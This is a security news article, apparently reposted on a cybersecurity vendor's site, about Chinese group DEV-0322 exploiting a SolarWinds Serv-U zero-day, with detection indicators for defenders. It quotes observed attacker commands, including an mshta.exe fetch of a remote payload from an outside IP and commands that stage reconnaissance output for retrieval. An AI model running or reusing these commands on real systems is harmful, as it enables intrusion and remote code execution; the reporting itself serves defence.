Privacy Ninja



        • Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

Chinese hackers use new SolarWinds zero-day in targeted attacks

Chinese hackers use new SolarWinds zero-day in targeted attacks

China-based hackers known to target US defense and software companies are now targeting organizations using a vulnerability in the SolarWinds Serv-U FTP server.

Today, SolarWinds released a security update for a zero-day vulnerability in Serv-U FTP servers that allow remote code execution when SSH is enabled.

According to SolarWinds, this vulnerability was disclosed by Microsoft, who saw a threat actor actively exploiting it to execute commands on vulnerable customer’s devices.

Tonight, Microsoft revealed that the attacks are attributed with high confidence to a China-based threat group tracked as ‘DEV-0322.’

“This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,” says a new blog post by the Microsoft Threat Intelligence Center.

Microsoft says the DEV-0322 hacking group has previously targeted entities in the US Defense Industrial Base Sector and software companies.

“The DIB Sector is the worldwide industrial complex that enables research and development (R&D), as well as design, production, delivery, and maintenance of military weapons systems, subsystems, and components or parts, to meet U.S. military requirements,” explains a CISA document describing the DIB sector.

Also Read: 5 Most Frequently Asked Questions About Ransomware

Attacks detected by Microsoft 365 Defender telemetry

Microsoft says they first learned of the attacks after Microsoft 365 Defender telemetry showed a normally harmless Serv-U process spawning anomalous malicious processes.

Some of the commands executed through the remote code execution vulnerability are listed below.

C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)

cmd.exe /c whoami > “./Client/Common/redacted.txt”

cmd.exe /c dir > “.\Client\Common\redacted.txt”

cmd.exe /c “”C:\Windows\Temp\Serv-U.bat””

powershell.exe C:\Windows\Temp\Serv-U.bat

cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

“We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands,” Microsoft explains in their blog post.

Other commands would add a global admin user to the Serv-U FTP server configuration or launch batch files and scripts to likely install malware on the devices for persistence and remote access.

Microsoft says Serv-U users can check if their devices were compromised by checking the Serv-U DebugSocketLog.txt log file and looking for exception messages.

A “C0000005; CSUSSHSocket::ProcessReceive” exception could indicate that the threat actors attempted to exploit the Serv-U server, but the exception could be shown for other reasons as well.

An example exception seen in logs is displayed below.

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5

Other signs that a device may have been compromised are:

  • Recently created .txt files under the Client\Common\ folder.
  • Serv-U spawned processes for mshta.exe, powershell.exe, cmd.exe, and processes running from C:\Windows\temp.
  • Unrecognized global users in the Serv-U configuration.

Also Read: 4 Things to Know When Installing CCTVs Legally



Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection


We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.


Click one of our contacts below to chat on WhatsApp

× Chat with us